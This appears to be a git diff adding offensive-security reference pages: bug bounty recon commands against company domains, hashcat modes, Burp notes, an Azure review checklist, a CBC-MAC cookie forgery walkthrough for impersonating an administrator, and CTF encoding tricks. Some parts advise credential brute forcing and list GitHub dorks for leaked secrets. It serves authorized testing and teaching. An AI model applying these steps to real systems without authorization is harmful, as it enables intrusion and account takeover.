+```
+
+Cracking Windows Hashes
+
+```text
+3000 | LM                                               | Operating-Systems
+1000 | NTLM                                             | Operating-Systems
+```
+
+Cracking Common Application Hashes
+
+```text
+  900 | MD4                                              | Raw Hash
+    0 | MD5                                              | Raw Hash
+ 5100 | Half MD5                                         | Raw Hash
+  100 | SHA1                                             | Raw Hash
+10800 | SHA-384                                          | Raw Hash
+ 1400 | SHA-256                                          | Raw Hash
+ 1700 | SHA-512                                          | Raw Hash
+```
+
+
+
diff --git a/bug-bounties-methodology.md b/bug-bounties-methodology.md
new file mode 100644
index 00000000..65d56147
--- /dev/null
+++ b/bug-bounties-methodology.md
@@ -0,0 +1,287 @@
+# Bug Bounties Methodology
+
+## Assets discoveries
+
+> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
+
+The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to:
+
+1. Find the acquisitions of the main company, this will give us the companies inside the scope.
+2. Find the ASN \(if any\) of each company, this will give us the IP ranges owned by each company
+3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\)
+4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\).
+
+### Acquisitions
+
+First of all, we need to know which **other companies are owned by the main company**.  
+One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.  
+Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**.
+
+> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
+
+### ASNs
+
+An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**.  
+An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
+
+It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.  
+****You can search by **company name**, by **IP** or by **domain** in [https://bgp.he.net/](https://bgp.he.net/).  
+Depending on the region of the company this links could be useful to gather more data: [AFRINIC](https://www.afrinic.net/) \(Africa\), [Arin](https://www.arin.net/about/welcome/region/)\(North America\), [APNIC](https://www.apnic.net/) \(Asia\), [LACNIC](https://www.lacnic.net/) \(Latin America\), [RIPE NCC](https://www.ripe.net/) \(Europe\). Anyway, probably all the **useful information** \(IP ranges and Whois\) **appears already in the first link**.
+
+```bash
+#You can try "automate" this with amass, but it's not very recommended
+amass intel -org tesla
+amass intel -asn 8911,50313,394161
+```
+
+You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\).
+
+### Looking for vulnerabilities
+
+At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.  
+Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) ****or use services like **shodan** to find **open ports** and depending on what you find you should **take a look in this book to how to pentest several possible service running**.  
+Also, It could be worth it to mention that you can also prepare some **default username** and **passwords** lists and try to **bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
+
+## Domains
+
+> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
+
+_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._ 
+
+First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
+
+### Reverse DNS
+
+As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\)
+
+```bash
+dnsrecon -r <DNS Range> -n <IP_DNS>   #DNS reverse of all of the addresses
+dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns
+dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns
+dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
+```
+
+For this to work, the administrator has to enable manually the PTR.  
+You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/)
+
+### Reverse Whois \(loop\)
+
+Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\).  
+You can use online tools like: 
+
+* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free**
+* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois)  - **Free**
+* [https://www.reversewhois.io/](https://www.reversewhois.io/)  - **Free**
+* \*\*\*\*[https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API.
+* \*\*\*\*[http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free
+* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free \(only **100 free** searches\)
+* [https://www.domainiq.com/](https://www.domainiq.com/) - Not Free
+
+You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)\(requires a whoxy API key\).  
+You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
+
+**Note that you can use this technique to discover more domain names every time you find a new domain.**
+
+### Trackers
+
+If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.  
+For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
+
+There are some pages that let you search by these trackers and more:
+
+* [**BuiltWith**](https://builtwith.com/)\*\*\*\*
+* \*\*\*\*[**Sitesleuth**](https://www.sitesleuth.io/)\*\*\*\*
+* \*\*\*\*[**Publicwww**](https://publicwww.com/)\*\*\*\*
+* \*\*\*\*[**SpyOnWeb**](http://spyonweb.com/)\*\*\*\*
+
+### Other ways
+
+**Note that you can use this technique to discover more domain names every time you find a new domain.**
+
+#### Shodan 
+
+As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
+
+You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"`
+
+#### Google
+
+Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages.
+
+#### Assetfinder
+
+[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
+
+### Looking for vulnerabilities
+
+Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company.
+
+If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.  
+_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
+
+## Subdomains
+
+> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
+
+It's time to find all the possible subdomains of each found domain.
+
+### DNS
+
+Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\).
+
+```bash
+dnsrecon -a -d tesla.com
+```
+
+### OSINT
+
+The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
+
+The most used tools are [**Amass**](https://github.com/OWASP/Amass)**,** [**subfinder**](https://github.com/projectdiscovery/subfinder)**,** [**findomain**](https://github.com/Edu4rdSHL/findomain/)**,** [**OneForAll**](https://github.com/shmilylty/OneForAll/blob/master/README.en.md)**,** [**assetfinder**](https://github.com/tomnomnom/assetfinder) ****and [**Subvenkon**](https://github.com/CoffeeJunkiee/Subvenkon), I would recommend to start using them configuring the API keys, and then start testing other tools or possibilities.
+
+```bash
+amass enum [-active] [-ip] -d tesla.com
+./subfinder-linux-amd64 -d tesla.com [-silent]
+./findomain-linux -t tesla.com [--quiet]
+python3 oneforall.py --target tesla.com [--dns False] [--req False] run
+assetfinder --subs-only <domain>
+```
+
+Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
+
+#### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/)
+
+This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
+
+You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
+
+### DNS Brute force
+
+Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.  
+The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) ****and ****[**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
+
+For this action you will need some common subdomains lists like:
+
+* [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)
+* [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak)
+
+For **massdns** you will need to pass as argument the file will all the **possible well formed subdomains** you want to bruteforce:
+
+```bash
+sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt
+./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt
+grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt
+```
+
+{% code title="Gobuster bruteforcing dns" %}
+```bash
+gobuster dns -d mysite.com -t 50 -w subdomains.txt
+```
+{% endcode %}
+
+### VHosts
+
+#### IP VHosts
+
+You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
+
+#### Brute Force
+
+If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
+
+```bash
+gobuster vhost -u https://mysite.com -t 50 -w subdomains.txt
+
+wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u http://example.com -t 100
+
+#From https://github.com/allyshka/vhostbrute
+vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com" --vhosts="vhosts_full.list" 
+```
+
+### DNS Brute Force v2
+
+Once you have finished looking for subdomains you can use [**dnsgen** ](https://github.com/ProjectAnte/dnsgen)and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
+
+### Buckets Brute Force
+
+While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.**  
+Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/).
+
+### Looking for vulnerabilities
+
+Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).  
+If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/).
+
+If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.  
+_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
+
+## Web servers hunting
+
+> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
+
+In the previous steps probably you have already perform some **recon to the IPs and domains discovered**, so you may **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope.
+
+Please, note that this will be **oriented to search for web apps**, you should **perform the vulnerability** and **port scanning** also \(**if allowed** by the scope\).
+
+A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](pentesting/pentesting-network/#http-port-discovery).  
+Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe) **and** [**fprobe**](https://github.com/theblackturtle/fprobe). You just pass a list of domains and it will try to connect to port 80 \(http\) and 443 \(https\). You can additional indicate to try other ports:
+
+```bash
+cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443
+cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
+```
+
+### Screenshots
+
+Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**.
+
+To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), ****[**Aquatone**](https://github.com/michenriksen/aquatone)**,** [**shutter**](https://shutter-project.org/downloads/) ****or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
+
+## Recapitulation 1
+
+> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\).  
+> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
+
+So you have already:
+
+1. Found all the **companies** inside the scope
+2. Found all the **assets** belonging to the companies \(and perform some vuln scan if in scope\)
+3. Found all the **domains** belonging to the companies
+4. Found all the **subdomains** of the domains \(any subdomain takeover?\)
+5. Found all the **web servers** and took a **screenshot** of them \(anything weird worth a deeper look?\)
+
+Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.**
+
+## **Bug hunting OSINT related information**
+
+Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
+
+### Api keys leaks in github
+
+* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
+* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
+* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks)
+* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob)
+* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
+* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets)
+* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
+* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
+* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
+
+**Dorks**:  _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._
+
+## [**Pentesting Web Methodology**](pentesting/pentesting-web/)\*\*\*\*
+
+Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/).
+
+## Recapitulation 2
+
+> Congratulations! The testing has finished! I hope you have find some vulnerabilities.
+
+At this point you should have already read the Pentesting Web Methodology and applied it to the scope.  
+As you can see there is a lot of different vulnerabilities to search for.
+
+**If you have find any vulnerability thanks to this book, please reference the book in your write-up.**
+
+
+
diff --git a/burp-suite.md b/burp-suite.md
new file mode 100644
index 00000000..465ae3dc
--- /dev/null
+++ b/burp-suite.md
@@ -0,0 +1,16 @@
+# Burp Suite
+
+## Basic Payloads
+
+* **Simple List:** Just a list containing an entry in each line
+* **Runtime File:** A list read in runtime \(not loaded in memory\). For supporting big lists.
+* **Case Modification:** Apply some changes to a list of strings\(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
+* **Numbers:** Generate numbers from X to Y using Z step or randomly.
+* **Brute Forcer:** Character set, min & max length.
+
+[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
+
+{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
+
+[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
+
diff --git a/cloud-security-review.md b/cloud-security-review.md
new file mode 100644
index 00000000..020b3a8e
--- /dev/null
+++ b/cloud-security-review.md
@@ -0,0 +1,100 @@
+# Cloud security review
+
+## Generic tools
+
+There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
+
+### [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
+
+AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
+
+```text
+pip3 install scoutsuite
+```
+
+### [cs-suite](https://github.com/SecurityFTW/cs-suite)
+
+AWS, GCP, Azure, DigitalOcean 
+
+```text
+git clone https://github.com/SecurityFTW/cs-suite.git && cd cs-suite/
+pip install virtualenv
+virtualenv -p python2.7 venv
+source venv/bin/activate
+pip install -r requirements.txt
+python cs.py --help
+```
+
+### Nessus
+
+Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
+
+### Common Sense
+
+Take a look to the **network access rules** and detect if the services are correctly protected:
+
+* ssh available from everywhere?
+* Unencrypted services running \(telnet, http, ...\)?
+* Unprotected admin consoles?
+* In general, check that all services are correctly protected depending on their needs
+
+## Azure
+
+Access the portal here: [http://portal.azure.com/](http://portal.azure.com/)  
+To start the tests you should have credentials for a **Global Reader user**.
+
+It is recommended to **install azure-cli** in a **linux** and **windows** virtual machines \(to be able to run powershell and python scripts\): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest)  
+Then, run `az login` to login. Note the **account information** and **token** will be **saved** inside _&lt;HOME&gt;/.azure_ \(in both Windows and Linux\).
+
+Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-&gt; Regulatory Compliance_ \(or try to access [https://portal.azure.com/\#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/22)\).  
+__If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" \(you can get some help using the following tools\). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw_wcB#microsoft-azure).
+
+### Run scanners
+
+Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**.
+
+```bash
+pip install scout
+scout azure --cli --report-dir <output_dir>
+
+#Fix azureaudit.py before launching cs.py
+#Adding "j_res = {}" on line 1074
+python cs.py -env azure
+
+#Azucar is an Azure security scanner for PowerShell (https://github.com/nccgroup/azucar)
+#Run it from its folder
+.\Azucar.ps1 -AuthMode Interactive -ForceAuth -ExportTo EXCEL
+
+#Azure-CIS-Scanner,CIS scanner for Azure (https://github.com/kbroughton/azure_cis_scanner)
+pip3 install azure-cis-scanner #Install
+azscan #Run, login before with `az login`
+```
+
+### More checks
+
+* Check for a **high number of Global Admin** \(between 2-4 are recommended\). Access it on: [https://portal.azure.com/\#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/Overview)
+* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button.
+
+![](.gitbook/assets/image%20%28281%29.png)
+
+* Dedicated admin account shouldn't have mailboxes \(they can only have mailboxes if they have Office 365\).
+* Local AD shouldn't be sync with Azure AD if not needed\([https://portal.azure.com/\#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/AzureADConnect)\). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled:
+
+![](.gitbook/assets/image%20%2852%29.png)
+
+* **Global Administrators** shouldn't be synced from a local AD. Check if Global Administrators emails uses the domain **onmicrosoft.com**. If not, check the source of the user, the source should be Azure Active Directory, if it comes from Windows Server AD, then report it.
+
+![](.gitbook/assets/image%20%2889%29.png)
+
+* **Standard tier** is recommended instead of free tier \(see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/\#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/24)\)
+* **Periodic SQL servers scans**: 
  _Select the SQL server_ --&gt; _Make sure that 'Advanced data security' is set to 'On'_ --&gt; _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --&gt; _Click Save_
+* **Lack of App Services restrictions**: Look for "App Services" in Azure \([https://portal.azure.com/\#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)\) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs.
+
+## AWS
+
+Get objets in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx)
+
+
+
+
+
diff --git a/crypto/cipher-block-chaining-cbc-mac-priv.md b/crypto/cipher-block-chaining-cbc-mac-priv.md
new file mode 100644
index 00000000..b06ba8f3
--- /dev/null
+++ b/crypto/cipher-block-chaining-cbc-mac-priv.md
@@ -0,0 +1,59 @@
+---
+description: 'https://pentesterlab.com/'
+---
+
+# Cipher Block Chaining CBC-MAC
+
+**Post from** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\*
+
+## CBC
+
+The easiest attack to test is that if the cookie just the username encrypted.
+
+If the cookie is only the username \(or the first part of the cookie is the username\) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and bruteforce the first byte of the cookie.
+
+## CBC-MAC
+
+CBC-MAC is a method to ensure integrity of a message by encrypting it using CBC mode and keeping the last encrypted block as "signature". This ensures that a malicious user can not modify any part of the data without having to change the signature. The key used for the "encryption" ensures that the signature can't be guessed.
+
+However, when using CBC-MAC, the developer needs to be very careful if the message are not of fixed length. In this example, we will use the fact that there is no protection in place to get the application to sign two messages and build another message by concatenating the two messages.
+
+## Theory
+
+With CBC-MAC, we can generate two signatures `t` and `t'` for the messages `m` and `m'`. By using `m` and `m'` we can forge another message `m''` that will have the same signature as `m'` \(`t'`\). One thing to keep in mind is that the recommended way to use CBC-MAC is to use a NULL IV.
+
+To keep things simple, we are going to work on a single block for each message.
+
+We can see below how signing both messages works \(NB: both signatures are completely independent from each other\):![](https://pentesterlab.com/cbc-mac/cbc-mac-1.png)
+
+If we try to concatenate those messages, the signature is no longer valid \(since `t` is now the IV for the second block where it was only NULL before\):![](https://pentesterlab.com/cbc-mac/cbc-mac-2.png)
+
+However, if we XOR `m'` and `t`, the signature is now `t'`:![](https://pentesterlab.com/cbc-mac/cbc-mac-3.png)
+
+## Implementation
+
+Based on the size of the signature, we can guess that the block size is likely to be 8. With this information, we will split `administrator`:
+
+* `administ`
+* `rator\00\00\00`
+
+We can trivially generate the signature for the first block, by just logging in and retrieving the signature `t`.
+
+For the second block, we want the `m'` XOR `t` to be equal to `rator\00\00\00`. So to generate the second username we will need to XOR `rator\00\00\00` with `t` \(since the application will sign it with a NULL IV instead of `t`\). Once we have this value, we can get the signature `t'`.
+
+Finally, we just need to concatenate `m` and `m'` to get `administrator` and use `t'` as signature.
+
+#### Resume
+
+1. Get the signature of username **administ** =  **t**
+2. Get the signature of username **rator\x00\x00\x00 XOR t** = **t'**
+3. Set in the cookie the value **administrator+t'** \(**t'** will be a valid signature of **\(rator\x00\x00\x00 XOR t\) XOR t** = **rator\x00\x00\x00**
+
+### CBC-MAC simple attack \(controlling IV\)
+
+If you can control the used IV the attack could be very easy.
+
+To impersonate the user "**administrator**" you can create the user "**Administrator**" and you will have the cookie with the **username+signature** and the cookie with the **IV**.
+
+To generate the cookies of the username "**administrator**" change the first cookie and set the username from "**Administrator**" to "**administrator**". Change the first byte of the cookie of the **IV** so **IV\[0\] XOR "A" == IV'\[0\] XOR "a"**. Using these cookies you can login as administrator.
+
diff --git a/crypto/crypto-ctfs-tricks.md b/crypto/crypto-ctfs-tricks.md
new file mode 100644
index 00000000..4ed9c5a5
--- /dev/null
+++ b/crypto/crypto-ctfs-tricks.md
@@ -0,0 +1,241 @@
+# Crypto CTFs Tricks
+
+## Online Hashes DBs
+
+* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
+* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/)
+* [https://crackstation.net/](https://crackstation.net/)
+* [https://md5decrypt.net/](https://md5decrypt.net/)
+* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
+* [https://gpuhash.me/](https://gpuhash.me/)
+* [https://hashes.org/search.php](https://hashes.org/search.php)
+* [https://www.cmd5.org/](https://www.cmd5.org/)
+* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
+* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
+
+## Enconders
+
+### Substitution Autosolvers
+
+* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
+
+#### Caesar - ROTx Autosolvers
+
+* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
+
+#### Atbash Cipher
+
+* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
+
+### Similar to BASE64
+
+Check all bases with: [https://github.com/mufeedvh/basecrack](https://github.com/mufeedvh/basecrack)
+
+* **Base32** \[_A-Z2-7=_\]
+  * `NBXWYYLDMFZGCY3PNRQQ====`
+* **Base58** \[_123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz_\]
+  * `2yJiRg5BF9gmsU6AC`
+* **Base62** \[_0-9A-Za-z_\]
+  * `g2AextRZpBKRBzQ9`
+* **Base64** \[_A-Za-z0-9+/=_\]
+  * `aG9sYWNhcmFjb2xh`
+* **Base85 --&gt; Like Ascii85**
+* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_\]
+  * `MIc3KiXa+Ihz+lrXMIc3KbCC`
+* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_\]
+  * `DmPsv8J7qrlKEoY7`
+* **MEGAN35** \[_3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5_\]
+  * `kLD8iwKsigSalLJ5`
+* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_\]
+  * `ayRiIo1gpO+uUc7g`
+* **ESAB46** \[\]
+  * `3sHcL2NR8WrT7mhR`
+* **MEGAN45** \[\]
+  * `kLD8igSXm2KZlwrX`
+* **TIGO3FX** \[\]
+  * `7AP9mIzdmltYmIP9mWXX`
+* **TRIPO5** \[\]
+  * `UE9vSbnBW6psVzxB`
+* **FERON74** \[\]
+  * `PbGkNudxCzaKBm0x`
+* **GILA7** \[\]
+  * `D+nkv8C1qIKMErY1`
+* **Citrix CTX1** \[\]
+  * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
+
+[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html)
+
+### HackerizeXS \[_╫Λ↻├☰┏_\]
+
+```text
+╫☐↑Λ↻Λ┏Λ↻☐↑Λ
+```
+
+* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
+
+### Morse
+
+```text
+.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- 
+```
+
+* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html)
+
+### UUencoder
+
+```text
+begin 644 webutils_pl
